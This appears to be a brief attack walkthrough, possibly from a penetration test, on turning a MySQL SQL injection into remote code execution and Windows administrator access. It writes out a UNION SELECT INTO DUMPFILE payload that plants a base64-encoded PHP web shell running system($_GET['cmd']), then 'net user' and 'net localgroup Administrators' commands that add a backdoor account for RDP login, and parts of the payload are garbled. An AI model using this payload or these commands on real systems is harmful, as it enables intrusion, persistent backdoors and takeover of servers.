SQL Injection & Remote Code Execution [MySQL]
We use sqlmap to verify which revealed that the parameter has a sql injection vulnerability.
we can use sql injection to create a file by use into dumpfile and make a simple backdoor with base64.
system($_GET["cmd"]); base64 > c3lzdGVtKCRfR0VUWyJjbWQiXSk7y=1') UNION ALL SELECT NULL,...,NULL,”<?php eval(base64_decode(‘c3lzdGVtKCRfR0VUWyJjbWQiXSk7’)); ?>”,...,NULL into dumpfile 283shell.php -- -
we can access to the backdoor and execute “whoami” command.
Then, using the net user command, we create an account to use RDP.
net user sa *password* /add
and make sa account to Administrators localgroup
net localgroup Administrators sa /add
login RDP with our credentials.
Finally, we are able to log in to RDP.